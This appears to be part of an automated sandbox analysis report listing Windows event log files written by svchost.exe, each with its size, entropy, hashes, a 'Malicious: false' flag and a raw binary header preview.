Entropy (8bit):	3.214241459952083
Encrypted:	false
SSDEEP:	384:phYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Kl7:p1T4h3b8
MD5:	B46C3FDFB6C7DB9A93A03E57EFFC227C
SHA1:	5EB10D8AB99B28DE09655D74100B9CB0DA9FDB08
SHA-256:	26EFEC50C8034F8C9F5239F9BE382FC4F5AC497C21E46EE8246DDAABD75C4378
SHA-512:	C277F3476C318AA8383EA94523E42034C7476459DEE9916D2BAB443146B1E90A843C63FF91FA3D7D36CADE977AFE457D4E18437D527D2E31D0829D27C01F062E
Malicious:	false
Preview:	ElfChnk.........h...............h...........x.......IdJ%......................................................................B.................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................n......./.......................**............... .$..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.4464288998983807
Encrypted:	false
SSDEEP:	384:4hFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDf3:4zSKEqsMuy6cwY
MD5:	F04E1FF30D3816888FB4228BD209B894
SHA1:	3EAC3EF3C9790E227A2FD72736859074DD6BD63A
SHA-256:	55FBE5D41797D7CB34CF93B7B6BC6ABA45BFB6C4FB8A23BF4EFEF5A334DC0EA5
SHA-512:	8EE43461D7DD26A3B5983C9DF12D848C28BFEFBFEC596A3168921B5EADD1782B68BF6591DBD92BD5EF2657A8855291D8F8E041EDEE2AADDA6E800A664519F4C2
Malicious:	false
Preview:	ElfChnk.........L...............L...........x........c.H....................................................................v.x.................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=................................................`..............................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.067148888183215
Encrypted:	false
SSDEEP:	384:ULhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3x:emw9g3Lq
MD5:	A07728B591EB727B0A12A7F4812E33FD
SHA1:	686A625F441C2C1F7F0014D91A056B7613417F6F
SHA-256:	7D977A38B89B89750F10FB6C8498F0543447E48E68A3B36B3A1837843A587FDC
SHA-512:	BF196C929DA34E3AC93DFDC5A81A700BFD08F1FD6AC5D9AF3A4EF36F453AAE2CC70B1E3218BFE83424E7995B7D31186472A0D3D8AE4CEA784EFD017E97B40C4B
Malicious:	false
Preview:	ElfChnk.........3...............3............i..Xk..5..#....................................................................b...................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#................................................X..............................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.8893215688880964
Encrypted:	false
SSDEEP:	384:kh8ID7I26uI/IIIyIXI0IFIEImIVIeIKILISIfIKIDI:kG
MD5:	5CDA3D3DF1D6A4C9347354B071EEC224
SHA1:	70C93CB24437506D497F0F8AFEAF015F00DCC4D9
SHA-256:	8D2FC1937ACDCF107BB037D3DDB139BE3820E310428656B449C4D5C95959976D
SHA-512:	A58532AE7B6EA9041723B93ECBED9FEFC743D9F0FD4F57A82A781629A39446E70FED79DA57A1C7594BCE2E930FCEA79EB1277470256FAE83B1D2FC595414502A
Malicious:	false
Preview:	ElfChnk.K.......L.......K.......L...........x...86..:........................................................................w.4................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...................................................................................................................&...............................**..x...K.......V.............x/.&........x/...].l..<.po........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 135, DIRTY
Category:	dropped
Size (bytes):	1052672
Entropy (8bit):	0.7931700078815549
Encrypted:	false
SSDEEP:	768:hnKx9PIEQ8QtnkVKRNlY20sMY3Dp13/n/ydIxm6g/ZSi+uQ/NujMAEWD4gm/Rg6R:ZpLp
MD5:	35842129D7DE80A8DB7027555B7F534B
SHA1:	3B00BDF41978F243C01C6E7D2704A9EDE79B0BB2
SHA-256:	FD097C351F282977EFDE281F49069F5DA9835F203F05A8F133F027F3D74BEFC7
SHA-512:	E8D3E625AD9713A5AA99113CBCE23D3397430C2333E6587A0C10C41E1733122A69E9562438FEA33FCB552CCB4E6F85C84B494BD860771C45067DB5E02E9477AC
Malicious:	false
Preview:	ElfFile.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9663038520584734
Encrypted:	false
SSDEEP:	384:5h1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMRvMZkfMRaMpD:5eJl
MD5:	86A6D68E140E1517787EDA3FD18564F5
SHA1:	2BABAE5027FD50AB02BEEEF51ECC71FC0F75D68B
SHA-256:	4DEB09BC314AB38A6DBA31C20B0448F0E21751D178CFC5B690A9D4D8095BF1AD
SHA-512:	F5B9F92A650CCBDA835128A63E8504912FCB88ED30B69CF74B6D181033CEFA25E2CF713E59DD4941F8D20039AAFCCC4E23C85364C3E7DEF91A5D691C80AEA14E
Malicious:	false
Preview:	ElfChnk.........................................+...?.t....................................................................?...........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&........................................................................................%..............................*..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.002414160361868
Encrypted:	false
SSDEEP:	384:Ohk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS1i:OBjdjP0csA6
MD5:	D5E869E018E536045E0FF7E5A28FA081
SHA1:	9B7411AAA0256B79B3167286F61C4306870A06F7
SHA-256:	66F207AADF4E78219862213E1E7BBA4BECAA9B26234154189C2D3E4CFA368559
SHA-512:	C73351E579D9B892F50B1080A9CE33EEB8AF84493432BDBD877CCC462FFF8BCB6E55BE07047B9D3FFC9E1F9165B27298417D45A1DDADFBC43D9F9E95FF75A632
Malicious:	false
Preview:	ElfChnk.........}...............}...........p...(...X.9.......................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................*..............5.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	77088
Entropy (8bit):	3.249009826536153
Encrypted:	false
SSDEEP:	384:I/IZW2IgI+ISIjI/IwIKTI1uISIGpXI/iIuIVIeIaI2InIHIQKhDIEQAGxIHIFIV:IAmKZxGo7m0
MD5:	BC819C48CC9181AE2BD1A1CEBB87EAC4
SHA1:	FADBB38FE85D6941D52E7CAAD968D4599720CF41
SHA-256:	BD8E4212A8ABDD00E21B8034CA016E54E2B1E4FCDECA831D121E90DF789EEE6A
SHA-512:	B43ADB9E21C37E974A0BF32744686269AB369557E47255480D41317C61BDC3C41CCC16E5DE8EFA6A471716AC023310E18E135C0429EF98EE41DBB2B8FE5FF366
Malicious:	false
Preview:	ElfChnk.T...............T...................P...h...1.......................................................................22.........................................>...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................1....................................J...)..........................*......w..........sc.........x/..J..............................................................,.......D.....!........... ....@*...sc.........x..............w....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s..z.?..nM.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s./.O.p.e.r.a.t.i.o.n.a.l.........&.......6p.\.#i....>..........2........A..=...>.../....=.......V.o.l.u.m.e.C.o.r.r.e.l.a.t.i.o.n.I.d.......A..7...>...)....=.......V.o.l.u.m.e.N.a.m.e.L.e.n.g.t.h....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8007387860709012
Encrypted:	false
SSDEEP:	384:FWh6iIvcImIvITIQIoIoI3IEIMIoIBIfbItrIpI6IEgISI:FWox2s
MD5:	B06D73E25BA08FF8467D39F5DF89D377
SHA1:	90DB6069630839F821B882D924FD4E6ABD3D248B
SHA-256:	11FB309C8130CA5816DC95586F2D061896F759594D4034F5469620BB059F8D57
SHA-512:	A0CC4A89CCD7A01DB57A2FB0DABD786DD8C43C97ED2149253CE7D08C3E4DACB617BFFC1C3EF07548B0671A30894C4ADE0D155FD94AF8A3D64D6984ADF018D63F
Malicious:	false
Preview:	ElfChnk.....................................X"...#....ey.....................................................................X)V............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................................................^...............................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.9976402956749943
Encrypted:	false
SSDEEP:	768:E4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH13S:+
MD5:	C68DBA1902028BC303B2EDAD3F04AF6D
SHA1:	2969D2BFB48FA51E9A2BA02B5D38C69A213BABC5
SHA-256:	9E806C7ABC1F37B21BB61750968DC54EA91DBD97B61657AC14E006EF1348C55A
SHA-512:	CDD8498CCF9D72349F19D33AEECCBCB1FFBF1F3C4841C466D2145366CE54150CE3CE60D180453809A86A4F02D5C6E9B48B5D4E2ABFD9D8CAA553479B61C40C77
Malicious:	false
Preview:	ElfChnk.....................................(...8.....j....................................................................Mh.Q................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ......................................................................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	29376
Entropy (8bit):	4.384183043481172
Encrypted:	false
SSDEEP:	384:IqOhbyayIy8yIyFtQyxdyNybynyayxyPyuyHyAyeyL6iybybyry3yQy4yDyoyJyW:I5Wtu6i
MD5:	48EB5C59C01A2AD15728AB986E577163
SHA1:	82C9C8ADE55C6DF9F16D2238F98E68EB05BB928F
SHA-256:	A185517AD4815E45CEF70D779A3E9C7E6A5666095443C792F25E479A3CABAFF0
SHA-512:	B051B696A76213A16A6F8231E4B1E77ECA50C7D64ECDA4391658A64CC28B0E5DABB9A96A4952B4A5F5940D797A533D94C62E4CE200AA9537C60B2A22C2C9A7AA
Malicious:	false
Preview:	ElfChnk.................P.......U...........0.......U.._......................................................................U.................0...........................=...........................................................................................................................f...............?...........................m...................M...F...................................................................................................................&...............................**..`...P.........z.sc.........x/.&........x/...].l..<.po........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	5.092539100936309
Encrypted:	false
SSDEEP:	768:R/xX8MKRrZ75fZ7b2qF0YiEIYAZ7UZ70DWmpKAdZ7fZ77:vKj7/7f0Ybs7U7MKAD7R7
MD5:	B88493CC9AE7358F34DD0602589D59EB
SHA1:	9D65DB0516BEA4CE4B4D46E73D6BDE81A780A906
SHA-256:	F8EF2420AE220FBFEF3522E8E8B18801E0098DBC55BE7D226681AC0A1339CE9D
SHA-512:	E7613AE90C8963DE6CCF409E42D709B5AC7B28DC45EC7F07582223D9A74A2C0799E92EA2DE7440D252551DA876D883068ED5A69AA155C244DCA840FE5506F800
Malicious:	false
Preview:	ElfChnk....................................................................................................................A-?/................^...........................=...........................................................................................................................f...............?...........................m...................M...F.......................W...................Gu..........................G,.......'...............r..................7............%..................**............................x/.&........x/...].l..<.po........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7290745403290391
Encrypted:	false
SSDEEP:	384:9hP8o8Z85848V8M8g8D8R8E8E8CI808w8:9w
MD5:	89E7777713491C10390441E5158FA628
SHA1:	03A0AD5211DD9BB9C4694EFEFB3A2AB560350217
SHA-256:	D6BC4561AAF5E7B76381EBA6E7280AE4DA64137D7D31BFF11C6E84E3061AD508
SHA-512:	4DD7F8C6B499F08558C2FAB11BF002B7B145E520B2F9792FDC0CC2C240C911BF0DAD25A52F5BA78B73AC510F36A7CBAA392ED06957C72F211E3AC1AF95053231
Malicious:	false
Preview:	ElfChnk.....................................@.......ZHg......................................................................]..........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................v...............................**..(.............................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.7568690134963987
Encrypted:	false
SSDEEP:	1536:LXhMUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:LXWnS
MD5:	ECD46A064220A0764571EE0CED149888
SHA1:	3832182E7BA600D31C2C4DE269AFBB21C26DD330
SHA-256:	38AC553FFD3980A0E72ADC936A9121C5A035A256977D789980C59837EBA9FDE2
SHA-512:	E34E48AC9B472D2FC372278935F262FB330D465FEB8CE7DCC2FB1586B1D47531A0AA645DCBC68450D44D2E7731938D82E4838602ADD6840FE6154F771E87EC88
Malicious:	false
Preview:	ElfChnk.........&...............&...........`G...I.....v......................................................................h.................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................................=......O.......................**..............g5...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.2643567487592065
Encrypted:	false
SSDEEP:	768:l0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9OOawa4RPvRkORN:3cE
MD5:	5D065681068DF8CC0FA43EB5CCF133B3
SHA1:	D324AF482D8B6E9880DF340E246A9D93AF7D6487
SHA-256:	306A477DDB08D33E7BCCC0430A596935FB41F076EEDC60D21FD2BE503D14C4ED
SHA-512:	57F523E73D3A926DE18ABF45A469940CDB3B0B66125C4F85196E78ED5E4171FB923CD36413AA4AB421AC326B9B5C548E16C212A09A7A7DE9FB6B64835D8A1760
Malicious:	false
Preview:	ElfChnk.........:...............:...........`o...q..`?..........................................................................................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F......................................&.......................................................................................]............]......*.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	81416
Entropy (8bit):	4.132611583340219
Encrypted:	false
SSDEEP:	384:/hAiYKzlj9/zyLQIq5yYq6iF5p7MiF5p2YiF5paCiF5yYhiF5p4iF5pEk5yY5LbW:/FLpBVi7CPs17V65/KwW
MD5:	05D900E8A88E30DE46E7E3A7C6D4B3B4
SHA1:	B41024F4CE852D8D20234D03BB2E9E328018E4B2
SHA-256:	85EDD4EF8B721FD5B70F7A43225678502973D8C031A00CB109DE05D08697217B
SHA-512:	91DDA0B58AC6BA12C9D7A21F4C9D96B1CA5FF58EF58BD09C08D52C05D3DCE8781090F2F598C06547795B4BF116F22794E7585E3F193159F0A181C7F4145405A3
Malicious:	false
Preview:	ElfChnk.)......./.......)......./............1...8..........................................................................Uy.................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F.........................................../.......................................................................&...............................**......)........E.(...........x/.&........x/...].l..<.po........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.316765768663329
Encrypted:	false
SSDEEP:	384:Nqs/hDGCyCkCzCRCFCwCSCRCbCZCzCS2J2S2b2p2TJ2u2DC/C725U272ED2W2G2z:Nqs/dLDHrg
MD5:	7F79E7A62ED9E4D755D124146C0DEEFA
SHA1:	1B6A1A25EA2DB2A01B775224FFB0454611FB8F64
SHA-256:	ECF7D036371BF9D0D8AF49606B74505211C102EC9218AB8C82E8E7B72FCE58AE
SHA-512:	FA3963CEBFADE41D9DE418D1A1B3AFB2CD1435905D86B5B74E89566855FF07AD9855825BC60A1E0E81550100619D3CE84F9AC73931FAD180998F48F8D9A52E84
Malicious:	false
Preview:	ElfChnk.U...............U...................`...h...d.].....................................................................B..................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F............................C..............................&................................................s......nt.......L......................**..0...U.........Df..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.487513277277551
Encrypted:	false
SSDEEP:	1536:iPdjnG8+xEARkMl3eF0fmhqwyNGhRhzBR9F7n3TtFFzmZJnctCdvWYOcdcPx7ZQm:iPdjnG8+xEARkMl3eF0fmhqwyNGhRhNr
MD5:	CB5A37366AA13834049EFB909E73FE47
SHA1:	2BBE706EE4027FA2EC2E3B0EA130BDDA8005C5CC
SHA-256:	D4FF5763682C7A3A03BA67911F7D6C8C73F1EC197CA329CA5A5646A08F16AAD6
SHA-512:	43E956E6C8175C6683218D11C038F285B3851E8113B7DB8F403B9752F8CA7ABE2B1398A6288DD2E742207D708CCA4F6002DA18CA44CF02B54B7BFF5977274CFE
Malicious:	false
Preview:	ElfChnk......................................a..hc..Z:I>........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................................O..............................**..............(.~+..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.464835680553597
Encrypted:	false
SSDEEP:	1536:hy7YcB8XF/vBRK8zBOcaLHRQNUI2gs0yfyGmmAiPPO+kRB/qHsPSXdmjoDPuYvRv:hy7YcB8XF/vBRK8zBOcaLHqNUI2gs0yV
MD5:	DE19A11BCC51162E73CA2C0FB7F11E8F
SHA1:	5A9B88704FFB074465CA661E1CC4D288492F3F29
SHA-256:	C661028D3918A05CD71248D0C2D34579D13391125C8E1C1ED7700501F2D31093
SHA-512:	34721C06D6C9E6B13DBBABD55F7C1D0FDDD9EBE5726F8F2F9CFCF137641945FDA9476129DF1DF036CBBC32D26EAC7D34DA247470E55B5CB090EDE02050FA135D
Malicious:	false
Preview:	ElfChnk........................................`...l^YQ.....................................................................eF.................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F........................................................................................................u..........9....s..)o...............w......**................[...........x/.&........x/...].l..<.po........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.5327342870547955
Encrypted:	false
SSDEEP:	384:L3ht7d7L7m7S7H7f7U7C7k7Y7Z707G7t7m7TM77n7l7s7b7F717d7k707W47K7M9:bMMhLuRytBb
MD5:	6F501FDB7A85D36C946EA0B4FBBA1D07
SHA1:	7BAC3F7C76CDDB61BAF45EABC7A428F02ED54266
SHA-256:	8271A81CB733CB5354EF9A894DCA84458CBF25E9C54B3BE9F5877DDA6D3D61FF
SHA-512:	26AF06D5B464EBD77F32F782C8585B63800F89EB2D0125DF677CF37CF31F7FDC3DE573B3E5B130A4BEE440CE9D93C1B2596948A33F276D3ED80B278F12ED4630
Malicious:	false
